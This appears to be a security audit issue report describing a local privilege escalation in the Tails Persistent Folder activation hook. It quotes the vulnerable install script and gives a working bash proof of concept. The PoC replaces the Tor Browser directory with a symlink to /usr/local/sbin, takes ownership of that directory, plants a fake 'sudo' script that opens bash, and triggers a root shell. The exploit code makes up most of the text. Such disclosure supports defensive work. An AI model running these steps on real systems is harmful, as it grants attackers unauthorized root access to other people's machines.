TPS - Local Privilege Escalation (LPE) via symlinks in Persistent Folder activation hook
This is https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/3
Technical Description
local/lib/persistent-storage/on-activated-hooks/PersistentDirectory/create-persistent-tor-browser-directory
#!/bin/sh
set -e
set -u
TOR_BROWSER_PERSISTENT_DIR='/home/amnesia/Persistent/Tor Browser'
install -d -o amnesia -g amnesia -m 0700 "$TOR_BROWSER_PERSISTENT_DIR"
Impact
POC:
#!/bin/bash
# 1. Activate Persistent Folder feature
echo "Manual Step -> activate the Persistent Folder feature..";
read -n 1 -s -p "Continue? Press any char..";
# 2. Remove TOR Browser directory in the Persistent Folder
echo -e "\n-> removed the TOR Browser directory in the Persistent Folder.."
rm -rf ~/Persistent/Tor\ Browser/
# 3. Create a symlink to /sbin
echo "-> create a symlink to /sbin"
ln -sf /usr/local/sbin '/home/amnesia/Persistent/Tor Browser'
echo "Manual Step -> reactivate the Persistent Folder feature"
read -n 1 -s -p "Continue? Press any char..";
# 4. Trigger Payload -> reactivate the Persistent Folder feature (manual)
# 5. Confirm that amensia is the owner with permissions 700 of /usr/local/sbin
echo -e "\n-> confirmed that amensia is the owner with permissions 700 of /usr/local/sbin"
ls -la /usr/local/sbin | grep "amnesia"
# 6. Drop a attacker-controlled sudo shell script
echo "-> drop a attacker-controlled sudo shell script and make it executable.."
echo -e '#!/bin/bash\n/bin/bash' > /usr/local/sbin/sudo && chmod +x /usr/local/sbin/sudo
# 8 . Get root shell
echo "-> trigger the root-shell.."
sudo /usr/local/lib/kill-boot-profile
Recommendation
Type
Local Privilege Escalation